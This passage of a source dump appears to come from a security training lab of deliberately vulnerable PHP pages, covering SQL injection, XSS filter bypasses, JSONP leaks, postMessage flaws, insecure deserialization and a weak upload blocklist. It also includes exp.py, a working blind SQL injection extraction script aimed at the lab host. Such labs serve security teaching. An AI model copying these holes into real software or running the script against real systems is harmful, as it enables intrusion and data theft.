43 |     		<input type="submit" value="Login" style="background-color: dodgerblue;">
44 |     	</form>
45 |     	</center>
46 |     </div>
47 |   </body>
48 | </html>


--------------------------------------------------------------------------------
/labs_docker/src/insecuredes/profile.php:
--------------------------------------------------------------------------------
 1 | <?php
 2 | session_start();
 3 | include 'classes.php';
 4 | if($_SESSION['islogin'] != 1){
 5 |     header("Location: login.php");
 6 |     die();
 7 | }
 8 | 
 9 | $sessionid = $_COOKIE['sessionid'];
10 | $deser = unserialize(base64_decode($sessionid));
11 | 
12 | $role = $deser->r;
13 | $uname = $deser->u;
14 | $dn = $deser->dn;
15 | 
16 | if($role == 'admin'){
17 |     $dn = "Admin";
18 | }
19 | 
20 | ?>
21 | 
22 | <html>
23 |   <head>
24 |     <title>Books Library</title>
25 |     <link rel="stylesheet" type="text/css" href="../style/css.css">
26 |   </head>
27 |   <body id="bodyId">
28 |     <div class="header">
29 |       <a href="index.php" class="logo">Books Library</a>
30 |       <div class="header-right">
31 |         <a href="index.php">Home</a>
32 |         <a class="active" href="profile.php">Profile</a>
33 |         <a href="login.php">Login</a>
34 |       </div>
35 |     </div>
36 |     <center>
37 |         <h3>Welcome <?php echo $dn;?>.</h3>
38 |     </center>
39 |     <div class="container">
40 |     <div class="be-comment-block">
41 |     </div>
42 |     </div>
43 |   </body>
44 | </html>


--------------------------------------------------------------------------------
/labs_docker/src/jsonp/index.php:
--------------------------------------------------------------------------------
 1 | <html>
 2 |   <head>
 3 |     <title>Books Library</title>
 4 |     <link rel="stylesheet" type="text/css" href="../style/css.css">
 5 |   </head>
 6 |   <body id="bodyId">
 7 |     <div class="header">
 8 |       <a href="index.php" class="logo">Books Library</a>
 9 |       <div class="header-right">
10 |         <a class="active" href="index.php">Home</a>
11 |         <a href="profile.php">Profile</a>
12 |         <a href="login.php">Login</a>
13 |       </div>
14 |     </div>
15 |     <div>
16 |         <center>
17 |             <br><br><br><h3 id="type"></h3>
18 |         </center>
19 |     </div>
20 |     <script type="text/javascript">
21 |         var msg = "Welcome To our website.We will servie you as best as we can, if you have any issue send to us.",
22 |             i=0,
23 |             body=document.getElementById('bodyId');
24 |         body.onload = function(){
25 |             'use strict';
26 |             var typeWriter = setInterval(function(){
27 | 
28 |                 document.getElementById('type').innerHTML += msg[i];
29 |                 i = i + 1;
30 | 
31 |                 if(i>msg.length-1){
32 |                     clearInterval(typeWriter)
33 |                 }
34 |             }, 100);
35 |         }
36 |     </script>
37 |   </body>
38 | </html>


--------------------------------------------------------------------------------
/labs_docker/src/jsonp/info.php:
--------------------------------------------------------------------------------
1 | <?php
2 | 
3 | header("Content-Type: application/json");
4 | if(isset($_GET['callback'])){
5 | 	echo $_GET['callback'].'({"username":"guest","Full Name":"Guest user", "email":"guest@gmail.com","privateGroups":["priv","private","our course","Work Group"]})';
6 | }else{
7 | 	echo '{"username":"guest","Full Name":"Guest user", "email":"guest@gmail.com","privateGroups":["priv","private","our course","Work Group"]}';
8 | }


--------------------------------------------------------------------------------
/labs_docker/src/jsonp/login.php:
--------------------------------------------------------------------------------
 1 | <?php
 2 | session_start();
 3 | 
 4 | if(isset($_POST['uname']) && isset($_POST['pwd'])){
 5 |   if($_POST['uname'] == "guest" && $_POST['pwd'] == "guest123") {
 6 |     $_SESSION['islogin'] = 1;
 7 |     $_SESSION['username'] = $_POST['uname'];
 8 |     header("Location: profile.php");
 9 |   }else{
10 |     echo "<script>alert('Username/Password is invalid.')</script>";
11 |   }
12 | }
13 | 
14 | 
15 | ?>
16 | <html>
17 |   <head>
18 |     <title>Books Library</title>
19 |     <link rel="stylesheet" type="text/css" href="../style/css.css">
20 |   </head>
21 |   <body id="bodyId">
22 |     <div class="header">
23 |       <a href="index.php" class="logo">Books Library</a>
24 |       <div class="header-right">
25 |         <a href="index.php">Home</a>
26 |         <a href="profile.php">Profile</a>
27 |         <a class="active" href="login.php">Login</a>
28 |       </div>
29 |     </div>
30 |     <div><br><br>
31 |       <center>
32 |       <form method="POST">
33 |         <input type="text" id="uname" name="uname" placeholder="Username" autocomplete="off"><br>
34 |         <input type="password" id="pwd" name="pwd" placeholder="Password" autocomplete="off"><br>
35 |         <input type="submit" value="Login" style="background-color: dodgerblue;">
36 |       </form>
37 |       </center>
38 |     </div>
39 |   </body>
40 | </html>


--------------------------------------------------------------------------------
/labs_docker/src/jsonp/profile.php:
--------------------------------------------------------------------------------
 1 | <?php
 2 | session_start();
 3 | 
 4 | if($_SESSION['islogin'] != 1){
 5 |     header("Location: login.php");
 6 |     die();
 7 | }
 8 | 
 9 | ?>
10 | <html>
11 |   <head>
12 |     <title>Books Library</title>
13 |     <link rel="stylesheet" type="text/css" href="../style/css.css">
14 |   </head>
15 |   <body id="bodyId">
16 |     <div class="header">
17 |       <a href="index.php" class="logo">Books Library</a>
18 |       <div class="header-right">
19 |         <a href="index.php">Home</a>
20 |         <a class="active" href="profile.php">Profile</a>
21 |         <a href="login.php">Login</a>
22 |       </div>
23 |     </div>
24 |     <div id=output>
25 |     	
26 |     </div>
27 |     <div class="container">
28 |     	<script type="text/javascript">
29 |     		function userInfo(data){
30 |     			var name = '<center><span>User Name: '+data["username"]+'</span><br>',
31 |     				email = '<span>Email: '+data['email']+'</span><br>',
32 |     				fname = '<span>Full Name: '+data['Full Name']+'</span></center>';
33 |     			document.getElementById('output').innerHTML = name+email+fname;
34 |     		}
35 |     	</script>
36 |     	<script src="http://vuln.labs/labs/jsonp/info.php?callback=userInfo"></script>
37 |     </div>
38 |   </body>
39 | </html>


--------------------------------------------------------------------------------
/labs_docker/src/postmessage/index.php:
--------------------------------------------------------------------------------
 1 | <html>
 2 |   <head>
 3 |     <title>Books Library</title>
 4 |     <script src="https://code.angularjs.org/1.1.5/angular.min.js"></script>
 5 |     <link rel="stylesheet" type="text/css" href="../style/css.css">
 6 |   </head>
 7 |   <body id="bodyId">
 8 |     <div class="header">
 9 |       <a href="index.php" class="logo">Books Library</a>
10 |       <div class="header-right">
11 |         <a class="active" href="index.php">Home</a>
12 |       </div>
13 |     </div>
14 |     <div>
15 |         <center>
16 |             <br><br><br><h3 id="type"></h3>
17 |         </center>
18 |     </div>
19 |     <script type="text/javascript">
20 |         var msg = "Welcome To our website.We will servie you as best as we can, if you have any issue send to us.",
21 |             i=0,
22 |             body=document.getElementById('bodyId');
23 |         body.onload = function(){
24 | 			document.getElementById('type').innerHTML += msg
25 |         }
26 | 
27 | 		window.addEventListener("message", displayMessage)
28 | 		function displayMessage(message){
29 | 			if(/http:\/\/trusteddomain.vuln.labs/.test(message.origin)){
30 | 				var recv = "User said: " + message.data;
31 | 				document.getElementById("type").innerHTML = recv
32 | 			}
33 | 		}
34 | </script>
35 |     </script>
36 |   </body>
37 | </html>


--------------------------------------------------------------------------------
/labs_docker/src/sql/exp.py:
--------------------------------------------------------------------------------
 1 | import requests
 2 | 
 3 | url = 'http://vuln.labs/labs/sql/login.php'
 4 | 
 5 | alpha = "abcdefghijklmnopqrstuvwxyz"
 6 | username = []
 7 | length = 0
 8 | 
 9 | place = 3
10 | 
11 | # get length
12 | for i in range(1, 20):
13 | 	link = url
14 | 	payload = "f' or length((select table_name from information_schema.tables where table_schema=database() limit "+str(place)+",1))="+str(i)+" limit 1,1#"
15 | 	params = {"pwd":"f",'uname':payload}
16 | 	req = requests.post(link, data=params)
17 | 	print(payload)
18 | 	if "Username/Password" not in req.text:
19 | 		length = i
20 | 		break
21 | 
22 | # extract info from database
23 | for i in range(1, length+1):
24 | 	for f in alpha:
25 | 		link = url
26 | 		payload = "f' or ascii(substring((select table_name from information_schema.tables where table_schema=database() limit "+str(place)+",1),"+str(i)+",1))="+str(ord(f))+" limit 1,1#"
27 | 		params = {"pwd":"f",'uname':payload}
28 | 		req = requests.post(link, data=params)
29 | 		
30 | 		if "Username/Password" not in req.text:
31 | 			print("Char: " + f)
32 | 			username.append(f)
33 | 
34 | 


--------------------------------------------------------------------------------
/labs_docker/src/sql/index.php:
--------------------------------------------------------------------------------
 1 | <html>
 2 |   <head>
 3 |     <title>Books Library</title>
 4 |     <script src="https://code.angularjs.org/1.1.5/angular.min.js"></script>
 5 |     <link rel="stylesheet" type="text/css" href="../style/css.css">
 6 |   </head>
 7 |   <body id="bodyId">
 8 |     <div class="header">
 9 |       <a href="index.php" class="logo">Books Library</a>
10 |       <div class="header-right">
11 |         <a class="active" href="index.php">Home</a>
12 |         <a href="search.php">Search</a>
13 |         <a href="profile.php">Profile</a>
14 |         <a href="login.php">Login</a>
15 |       </div>
16 |     </div>
17 |     <div>
18 |         <center>
19 |             <br><br><br><h3 id="type"></h3>
20 |         </center>
21 |     </div>
22 |     <script type="text/javascript">
23 |         var msg = "Welcome To our website.We will servie you as best as we can, if you have any issue send to us.",
24 |             i=0,
25 |             body=document.getElementById('bodyId');
26 |         body.onload = function(){
27 |             'use strict';
28 |             var typeWriter = setInterval(function(){
29 | 
30 |                 document.getElementById('type').innerHTML += msg[i];
31 |                 i = i + 1;
32 | 
33 |                 if(i>msg.length-1){
34 |                     clearInterval(typeWriter)
35 |                 }
36 |             }, 100);
37 |         }
38 |     </script>
39 |   </body>
40 | </html>


--------------------------------------------------------------------------------
/labs_docker/src/sql/login.php:
--------------------------------------------------------------------------------
 1 | <?php
 2 | session_start();
 3 | 
 4 | require("../config.php");
 5 | 
 6 | if(isset($_POST['uname']) && isset($_POST['pwd'])){
 7 | 	
 8 | 	$uname = $_POST['uname'];
 9 | 	$pwd = $_POST['pwd'];
10 | 
11 | 	$sql = "SELECT * FROM users WHERE username='$uname' and pass='$pwd';";
12 | 	// echo $sql;
13 | 	$res = @mysqli_query($conn, $sql);
14 | 	$count = @mysqli_num_rows($res);
15 | 	$rows = @mysqli_fetch_array($res);
16 | 
17 | 	// union, seleft, version, ', "
18 | 
19 | 	if($count > 0) {
20 | 		$_SESSION['islogin'] = 1;
21 | 		$_SESSION['username'] = $rows['username'];
22 | 		header("Location: profile.php");
23 | 	}else{
24 | 		echo "<script>alert('Username/Password is invalid.')</script>";
25 | 	}
26 | }
27 | ?>
28 | <html>
29 |   <head>
30 |     <title>Books Library</title>
31 |     <link rel="stylesheet" type="text/css" href="../style/css.css">
32 |   </head>
33 |   <body id="bodyId">
34 |     <div class="header">
35 |       <a href="index.php" class="logo">Books Library</a>
36 |       <div class="header-right">
37 |         <a href="index.php">Home</a>
38 |         <a href="search.php">Search</a>
39 |         <a href="profile.php">Profile</a>
40 |         <a class="active" href="login.php">Login</a>
41 |       </div>
42 |     </div>
43 |     <div><br><br>
44 |     	<center>
45 |     	<form method="POST">
46 |     		<input type="text" id="uname" name="uname" placeholder="Username" autocomplete="off"><br>
47 |     		<input type="password" id="pwd" name="pwd" placeholder="Password" autocomplete="off"><br>
48 |     		<input type="submit" value="Login" style="background-color: dodgerblue;">
49 |     	</form>
50 |     	</center>
51 |     </div>
52 |   </body>
53 | </html>


--------------------------------------------------------------------------------
/labs_docker/src/sql/profile.php:
--------------------------------------------------------------------------------
 1 | <?php
 2 | session_start();
 3 | 
 4 | if($_SESSION['islogin'] != 1){
 5 |     header("Location: login.php");
 6 |     die();
 7 | }
 8 | 
 9 | ?>
10 | 
11 | <html>
12 |   <head>
13 |     <title>Books Library</title>
14 |     <link rel="stylesheet" type="text/css" href="../style/css.css">
15 |   </head>
16 |   <body id="bodyId">
17 |     <div class="header">
18 |       <a href="index.php" class="logo">Books Library</a>
19 |       <div class="header-right">
20 |         <a href="index.php">Home</a>
21 |         <a href="search.php">Search</a>
22 |         <a class="active" href="profile.php">Profile</a>
23 |         <a href="login.php">Login</a>
24 |       </div>
25 |     </div>
26 |     
27 |     <div class="container">
28 |     <div class="be-comment-block">
29 |         <div class="be-comment">
30 |         <?php
31 | 
32 |         echo "<center><h1>Welcome <i>".@$_SESSION['username']."</i></h1></center>";
33 | 
34 |         ?>
35 |         </div>
36 |     </div>
37 |     </div>
38 |   </body>
39 | </html>


--------------------------------------------------------------------------------
/labs_docker/src/sql/search.php:
--------------------------------------------------------------------------------
 1 | <?php
 2 | $print = 0;
 3 | if(isset($_GET['name'])){
 4 | 
 5 |   require("../config.php");
 6 | 
 7 | 	$name = $_GET['name'];
 8 | 	$sql = "SELECT * FROM books where name like '%$name%';";
 9 | 
10 | 	$res = mysqli_query($conn, $sql);
11 | 	$rows = mysqli_fetch_array($res);
12 | 	$print = 1;
13 | }
14 | 
15 | ?>
16 | <html>
17 |   <head>
18 |     <title>Books Application</title>
19 |     <link rel="stylesheet" type="text/css" href="../style/css.css">
20 |   </head>
21 |   <body>
22 |     <div class="header">
23 |       <a href="index.php" class="logo">Books Library</a>
24 |       <div class="header-right">
25 |         <a href="index.php">Home</a>
26 |         <a class="active" href="search.php">Search</a>
27 |         <a href="profile.php">Profile</a>
28 |         <a href="login.php">Login</a>
29 |       </div>
30 |     </div><br><br><br><br>
31 |     <center>
32 |         <form method="get">
33 |             <label>Name:</label>
34 |             <input type="text" id="name" name="name" placeholder="Enter a name here" autocomplete="off">
35 |             <input type="submit" id="search" value="search">
36 |         </form>
37 |     <div ng-app>
38 |         <p id="printOut">
39 |         	<?php
40 | if ($print == 1){
41 | 	if($rows){
42 | 		echo "<label>Auther: ".$rows['auther']."</label><br>";
43 | 		echo "<label>Book Name: ".$rows['name']."</label><br>";
44 | 		echo "<label>Story: ".$rows['story']."</label>";
45 | 	}
46 | }
47 | 
48 |         	?>
49 |         </p>
50 |     </div>
51 |     </center>
52 |   </body>
53 | </html>


--------------------------------------------------------------------------------
/labs_docker/src/style/css.css:
--------------------------------------------------------------------------------
  1 | #name{
  2 |   width: 300px;
  3 |   height: 30px;
  4 |   text-align: center;
  5 |   border-radius: 4px;
  6 | }
  7 | input{border-style: solid;background: #f1f1f1;}
  8 | input[type="submit"]{
  9 |     width: 60px;
 10 |     height: 30px;
 11 | }
 12 | 
 13 | #fname, #email{
 14 |   height: 40px;
 15 |   text-align: center;
 16 | }
 17 | #send{
 18 |   background-color: dodgerblue;
 19 |   height: 40px
 20 | }
 21 | #msg{
 22 |   height: 200px;
 23 |   background: #f1f1f1;
 24 | }
 25 | 
 26 | #pwd,#uname,#fname, #email, #msg, #send{
 27 |   width: 400px;
 28 |   margin: 2px;
 29 |   border-style: solid;
 30 | }
 31 | 
 32 | #search{
 33 |   color: black;
 34 |   text-align: center;
 35 |   text-decoration: none;
 36 |   border-radius: 4px;
 37 | }
 38 | body{background: #f1f1f1;}
 39 | #type{
 40 |   width: 400px;
 41 | }
 42 | 
 43 | /* Style the header with a grey background and some padding */
 44 | .header {
 45 |   overflow: hidden;
 46 |   background-color: #f1f1f1;
 47 |   padding: 20px 10px;
 48 | }
 49 | 
 50 | /* Style the header links */
 51 | .header a {
 52 |   float: left;
 53 |   color: black;
 54 |   text-align: center;
 55 |   padding: 12px;
 56 |   text-decoration: none;
 57 |   font-size: 18px;
 58 |   line-height: 25px;
 59 |   border-radius: 4px;
 60 | }
 61 | 
 62 | /* Style the logo link (notice that we set the same value of line-height and font-size to prevent the header to increase when the font gets bigger */
 63 | .header a.logo {
 64 |   font-size: 25px;
 65 |   font-weight: bold;
 66 | }
 67 | 
 68 | /* Change the background color on mouse-over */
 69 | .header a:hover {
 70 |   background-color: #ddd;
 71 |   color: black;
 72 | }
 73 | 
 74 | /* Style the active/current link*/
 75 | .header a.active {
 76 |   background-color: dodgerblue;
 77 |   color: white;
 78 | }
 79 | 
 80 | /* Float the link section to the right */
 81 | .header-right {
 82 |   float: right;
 83 | }
 84 | 
 85 | /* Add media queries for responsiveness - when the screen is 500px wide or less, stack the links on top of each other */
 86 | @media screen and (max-width: 500px) {
 87 |   .header a {
 88 |     float: none;
 89 |     display: block;
 90 |     text-align: left;
 91 |   }
 92 |   .header-right {
 93 |     float: none;
 94 |   }
 95 | }
 96 | 
 97 | .be-comment-block {
 98 |     margin-bottom: 50px !important;
 99 |     border: 1px solid #edeff2;
100 |     border-radius: 2px;
101 |     padding: 50px 70px;
102 |     border:1px solid #ffffff;
103 | }
104 | 
105 | .comments-title {
106 |     font-size: 16px;
107 |     color: #262626;
108 |     margin-bottom: 15px;
109 |     font-family: 'Conv_helveticaneuecyr-bold';
110 | }
111 | 
112 | .be-img-comment {
113 |     width: 60px;
114 |     height: 60px;
115 |     float: left;
116 |     margin-bottom: 15px;
117 | }
118 | 
119 | .be-ava-comment {
120 |     width: 60px;
121 |     height: 60px;
122 |     border-radius: 50%;
123 | }
124 | 
125 | .be-comment-content {
126 |     margin-left: 80px;
127 | }
128 | 
129 | .be-comment-content span {
130 |     display: inline-block;
131 |     width: 49%;
132 |     margin-bottom: 15px;
133 | }
134 | 
135 | .be-comment-name {
136 |     font-size: 13px;
137 |     font-family: 'Conv_helveticaneuecyr-bold';
138 | }
139 | 
140 | .be-comment-content a {
141 |     color: #383b43;
142 | }
143 | 
144 | .be-comment-content span {
145 |     display: inline-block;
146 |     width: 49%;
147 |     margin-bottom: 15px;
148 | }
149 | 
150 | .be-comment-time {
151 |     text-align: right;
152 | }
153 | 
154 | .be-comment-time {
155 |     font-size: 11px;
156 |     color: #b4b7c1;
157 | }
158 | 
159 | .be-comment-text {
160 |     font-size: 13px;
161 |     line-height: 18px;
162 |     color: #7a8192;
163 |     display: block;
164 |     background: #f6f6f7;
165 |     border: 1px solid #edeff2;
166 |     padding: 15px 20px 20px 20px;
167 | }
168 | 
169 | .form-group.fl_icon .icon {
170 |     position: absolute;
171 |     top: 1px;
172 |     left: 16px;
173 |     width: 48px;
174 |     height: 48px;
175 |     background: #f6f6f7;
176 |     color: #b5b8c2;
177 |     text-align: center;
178 |     line-height: 50px;
179 |     -webkit-border-top-left-radius: 2px;
180 |     -webkit-border-bottom-left-radius: 2px;
181 |     -moz-border-radius-topleft: 2px;
182 |     -moz-border-radius-bottomleft: 2px;
183 |     border-top-left-radius: 2px;
184 |     border-bottom-left-radius: 2px;
185 | }
186 | .form-input{
187 |   border: 1px solid #000;
188 |   border-radius: 3px;
189 | }
190 | .form-group{
191 |   border: 1px solid #edeff2;
192 |   border-radius: 3px;
193 | }
194 | .form-group .form-input {
195 |     font-size: 13px;
196 |     line-height: 50px;
197 |     font-weight: 400;
198 |     color: #000;
199 |     width: 100%;
200 |     height: 50px;
201 |     padding-left: 20px;
202 |     padding-right: 20px;
203 | }
204 | 
205 | .form-group.fl_icon .form-input {
206 |     padding-left: 70px;
207 | }
208 | 
209 | .form-group textarea.form-input {
210 |     height: 150px;
211 | }


--------------------------------------------------------------------------------
/labs_docker/src/upload/index.php:
--------------------------------------------------------------------------------
 1 | <html>
 2 |   <head>
 3 |     <title>Books Library</title>
 4 |     <script src="https://code.angularjs.org/1.1.5/angular.min.js"></script>
 5 |     <link rel="stylesheet" type="text/css" href="../style/css.css">
 6 |   </head>
 7 |   <body id="bodyId">
 8 |     <div class="header">
 9 |       <a href="index.php" class="logo">Books Library</a>
10 |       <div class="header-right">
11 |         <a class="active" href="index.php">Home</a>
12 |         <a href="profile.php">Profile</a>
13 |         <a href="login.php">Login</a>
14 |       </div>
15 |     </div>
16 |     <div>
17 |         <center>
18 |             <br><br><br><h3 id="type"></h3>
19 |         </center>
20 |     </div>
21 |     <script type="text/javascript">
22 |         var msg = "Welcome To our website.We will servie you as best as we can, if you have any issue send to us.",
23 |             i=0,
24 |             body=document.getElementById('bodyId');
25 |         body.onload = function(){
26 |             'use strict';
27 |             var typeWriter = setInterval(function(){
28 | 
29 |                 document.getElementById('type').innerHTML += msg[i];
30 |                 i = i + 1;
31 | 
32 |                 if(i>msg.length-1){
33 |                     clearInterval(typeWriter)
34 |                 }
35 |             }, 100);
36 |         }
37 |     </script>
38 |   </body>
39 | </html>


--------------------------------------------------------------------------------
/labs_docker/src/upload/login.php:
--------------------------------------------------------------------------------
 1 | <?php
 2 | session_start();
 3 | if(isset($_POST['uname']) && isset($_POST['pwd'])){
 4 | 	if($_POST['uname'] == "guest" && $_POST['pwd'] == "guest123") {
 5 | 		$_SESSION['islogin'] = 1;
 6 | 		$_SESSION['username'] = $_POST['uname'];
 7 | 		header("Location: profile.php");
 8 | 	}else{
 9 | 		echo "<script>alert('Username/Password is invalid.')</script>";
10 | 	}
11 | }
12 | ?>
13 | <html>
14 |   <head>
15 |     <title>Books Library</title>
16 |     <link rel="stylesheet" type="text/css" href="../style/css.css">
17 |   </head>
18 |   <body id="bodyId">
19 |     <div class="header">
20 |       <a href="index.php" class="logo">Books Library</a>
21 |       <div class="header-right">
22 |         <a href="index.php">Home</a>
23 |         <a href="profile.php">Profile</a>
24 |         <a class="active" href="login.php">Login</a>
25 |       </div>
26 |     </div>
27 |     <div><br><br>
28 |     	<center>
29 |     	<form method="POST">
30 |     		<input type="text" id="uname" name="uname" placeholder="Username" autocomplete="off"><br>
31 |     		<input type="password" id="pwd" name="pwd" placeholder="Password" autocomplete="off"><br>
32 |     		<input type="submit" value="Login" style="background-color: dodgerblue;">
33 |     	</form>
34 |     	</center>
35 |     </div>
36 |   </body>
37 | </html>


--------------------------------------------------------------------------------
/labs_docker/src/upload/profile.php:
--------------------------------------------------------------------------------
 1 | <?php
 2 | session_start();
 3 | 
 4 | if($_SESSION['islogin'] != 1){
 5 |     header("Location: login.php");
 6 |     die();
 7 | }
 8 | $msg="";
 9 | if( isset( $_FILES[ 'upload' ] ) ) {
10 | 
11 |     $target_dir  = "/var/www/html/userfiles/";
12 |     $target_file = basename( $_FILES[ 'upload' ][ 'name' ] );
13 |     $target_ext  = substr( $target_file, strrpos( $target_file, '.' ) + 1);
14 |     $target_path = $target_dir . $target_file;
15 | 
16 |     // echo $target_path;
17 |     
18 |     $blocked = array('php','html','jsp','shtml','exe');
19 | 
20 |     if( in_array($target_ext, $blocked) ){
21 |         
22 |         $msg .= "Not allowd Extension.";
23 | 
24 |     }else{
25 |         if(!file_exists($target_path)){            
26 |             if( !move_uploaded_file( $_FILES[ 'upload' ][ 'tmp_name' ], $target_path ) ) {
27 |             // No
28 |                 $msg .= 'Your image was not uploaded.';
29 |             }
30 |             else {
31 |                 // Yes!
32 |                 $msg .= "{$target_file} succesfully uploaded!";
33 |             }
34 |         }else{
35 |             $msg .= "File already exists.";
36 |         }
37 |     }
38 | }
39 | 
40 | ?>
41 | <html>
42 |   <head>
43 |     <title>Books Library</title>
44 |     <link rel="stylesheet" type="text/css" href="../style/css.css">
45 |   </head>
46 |   <body id="bodyId">
47 |     <div class="header">
48 |       <a href="index.php" class="logo">Books Library</a>
49 |       <div class="header-right">
50 |         <a href="index.php">Home</a>
51 |         <a class="active" href="profile.php">Profile</a>
52 |         <a href="login.php">Login</a>
53 |       </div>
54 |     </div>
55 |     <center>
56 |     <div class="container">
57 |         <form class="form-block" method="post" enctype="multipart/form-data">
58 |             <input type="file" name="upload">
59 |             <input type="submit" value="upload">
60 |         </form>
61 |         <pre><?php echo htmlentities($msg);?></pre>
62 |     </div>
63 |     </center>
64 |     </div>
65 |   </body>
66 | </html>


--------------------------------------------------------------------------------
/labs_docker/src/xss/XSS Fileters&Bypasses/endpoint.php:
--------------------------------------------------------------------------------
 1 | <?php
 2 | 
 3 | # JSONP endpoint
 4 | header("Content-Type: application/json");
 5 | 
 6 | if(isset($_GET['callback'])){
 7 | 	echo $_GET['callback'].'({"name":"Tester","email":"test@gmail.com"})';
 8 | }else{
 9 | 	echo '{"name":"Tester","email":"test@gmail.com"}';
10 | }


--------------------------------------------------------------------------------
/labs_docker/src/xss/XSS Fileters&Bypasses/xss1.php:
--------------------------------------------------------------------------------
 1 | <?php
 2 | 
 3 | # Bypass using Hex / unicode
 4 | echo "\u003Cimg src=x onerror=alert(0)\u003C";
 5 | $input = $_GET['q'];
 6 | 
 7 | function check($val){
 8 | 	$illegal = "<>'\"";
 9 | 	$ch = strpbrk($val, $illegal);
10 | 
11 | 	if( $ch ){
12 | 		echo "'XSS DETECTED'";
13 | 	}else{
14 | 		echo "'".$val."'";
15 | 	}
16 | }
17 | 
18 | ?>
19 | 
20 | <div id=xssMe></div>
21 | 
22 | <script type="text/javascript">
23 | 	document.getElementById('xssMe').innerHTML = <?php check($input);?>;
24 | </script>


--------------------------------------------------------------------------------
/labs_docker/src/xss/XSS Fileters&Bypasses/xss2.php:
--------------------------------------------------------------------------------
 1 | <?php
 2 | 
 3 | # Bypass using eval
 4 | 
 5 | $input = $_GET['q'];
 6 | 
 7 | function check($val){
 8 | 	$f = preg_match_all('#(write|confirm|alert|prompt|src)#i', $GLOBALS['input']);
 9 | 	if($f)
10 | 		echo "XSS DETECTED";
11 | 	else
12 | 		echo $val;
13 | }
14 | 
15 | ?>
16 | 
17 | <div id=xssMe><?php check($input);?></div>
18 | 


--------------------------------------------------------------------------------
/labs_docker/src/xss/XSS Fileters&Bypasses/xss3.php:
--------------------------------------------------------------------------------
 1 | <?php
 2 | 
 3 | # wirte valid syntax
 4 | 
 5 | $input = @$_GET['q'];
 6 | 
 7 | function check($val){
 8 | 	$finder = 0;
 9 | 	if($finder)
10 | 		echo "fixed value";
11 | 	else
12 | 		echo $val;
13 | }
14 | 
15 | ?>
16 | 
17 | <div id=xssMe></div>
18 | <script type="text/javascript">
19 | 	function vulnFunc(){
20 | 		var x = "<?php echo check($input);?>";
21 | 	}
22 | 
23 | 	document.getElementById('xssMe').innerHTML = "<h1>Dummy String</h1>"
24 | </script>


--------------------------------------------------------------------------------
/labs_docker/src/xss/XSS Fileters&Bypasses/xss4.php:
--------------------------------------------------------------------------------
 1 | <?php
 2 | 
 3 | # Bypass using external js
 4 | 
 5 | $input = $_GET['q'];
 6 | 
 7 | function check($val){
 8 | 	echo strtoupper($val);
 9 | }
10 | 
11 | ?>
12 | 
13 | <div id=xssMe><?php echo check($input);?></div>


--------------------------------------------------------------------------------
/labs_docker/src/xss/XSS Fileters&Bypasses/xss5.php:
--------------------------------------------------------------------------------
 1 | <?php
 2 | 
 3 | # Bypass CSP using jsonp
 4 | 
 5 | $headerCSP = "Content-Security-Policy: default-src 'self';script-src 'self';img-src 'self';object-src 'none';";
 6 | header($headerCSP);
 7 | 
 8 | $input = $_GET['q'];
 9 | 
10 | function check($val){
11 | 	
12 | 	echo $val;
13 | 
14 | }
15 | 
16 | ?>
17 | 
18 | <div id=xssMe><?php check($input);?></div>


--------------------------------------------------------------------------------
/labs_docker/src/xss/XSS Fileters&Bypasses/xss6.php:
--------------------------------------------------------------------------------
 1 | <?php
 2 | 
 3 | # Bypass using operation [ - + * & ^ ]
 4 | 
 5 | $input = $_GET['q'];
 6 | 
 7 | function check($val){
 8 | 
 9 | 	$out = preg_replace("/[\%\[\],\{\}]/", "", $val);
10 | 	
11 | 	echo $out;
12 | 
13 | }
14 | 
15 | ?>
16 | 
17 | <script type="text/javascript">
18 | 	window.test={
19 | 		site: "test",
20 | 		page:{
21 | 			name: '<?php check($input);?>';
22 | 		}
23 | 	}
24 | </script>


--------------------------------------------------------------------------------
/labs_docker/src/xss/about.php:
--------------------------------------------------------------------------------
 1 | <html>
 2 |   <head>
 3 |     <title>Books Library</title>
 4 |     <script src="https://code.angularjs.org/1.1.5/angular.min.js"></script>
 5 |     <link rel="stylesheet" type="text/css" href="../style/css.css">
 6 |   </head>
 7 |   <body id="bodyId">
 8 |     <div class="header">
 9 |       <a href="index.php" class="logo">Books Library</a>
10 |       <div class="header-right">
11 |         <a href="index.php">Home</a>
12 |         <a href="search.php">Search</a>
13 |         <a href="contact.php">Contact</a>
14 |         <a class="active" href="about.php#about">About</a>
15 |         <a href="profile.php">Profile</a>
16 |         <a href="login.php">Login</a>
17 |       </div>
18 |     </div>
19 |     <div>
20 |         <center>
21 |             <br><br><br><h2 id="type"></h2>
22 |         </center>
23 |     </div>
24 |     <script type="text/javascript">
25 | 
26 |         var source="This is "+decodeURIComponent(location.hash.split("#")[1])+" page.";
27 |         var h3 = document.getElementById("type");
28 |         h3.innerHTML = source;
29 |     </script>
30 |   </body>
31 | </html>


--------------------------------------------------------------------------------
/labs_docker/src/xss/contact.php:
--------------------------------------------------------------------------------
 1 | <?php
 2 | 
 3 | if(!isset($_GET['lang'])){
 4 |   header("Location: contact.php?lang=en");
 5 | }
 6 | 
 7 | require("../config.php");
 8 | 
 9 | if(isset($_POST['name']) && isset($_POST['email']) && isset($_POST['msg'])){
10 |   
11 |   $name = addslashes($_POST['name']);
12 |   $email = addslashes($_POST['email']);
13 |   $msg = addslashes($_POST['msg']);
14 |   $user_agent = addslashes($_SERVER['HTTP_USER_AGENT']);
15 | 
16 |   $sql = "INSERT INTO contact values('$name','$email','$msg','$user_agent')";
17 | 
18 |   $execute = mysqli_query($conn, $sql);
19 | 
20 |   echo "<script>alert('Your message sent to Admin.')</script>";
21 | }
22 | ?>
23 | 
24 | <html>
25 |   <head>
26 |     <title>Books Library</title>
27 |     <script src="https://code.angularjs.org/1.1.5/angular.min.js"></script>
28 |     <link rel="stylesheet" type="text/css" href="../style/css.css">
29 |     <!-- <link rel="stylesheet" type="text/css" href="../style/<?php echo @$_GET['lang'];?>.lang"> -->
30 |   </head>
31 |   <body id="bodyId">
32 |     <div class="header">
33 |       <a href="index.php" class="logo">Books Library</a>
34 |       <div class="header-right">
35 |         <a href="index.php">Home</a>
36 |         <a href="search.php">Search</a>
37 |         <a class="active" href="contact.php">Contact</a>
38 |         <a href="about.php#about">About</a>
39 |         <a href="profile.php">Profile</a>
40 |         <a href="login.php">Login</a>
41 |       </div>
42 |     </div>
43 |     <div><br><br><br><br>
44 |     <center>
45 |         <form method="post" action="contact.php?lang=en">
46 | 
47 |         	<input id="fname" type="text" name="name" autocomplete="off" placeholder="Your Name"><br>
48 | 
49 |         	<input id="email" type="email" name="email" autocomplete="off" placeholder="Email"><br>
50 | 
51 |         	<textarea id="msg" name="msg" autocomplete="off" placeholder="Message"></textarea><br>
52 |         	<input id="send" type="submit" value="Send">
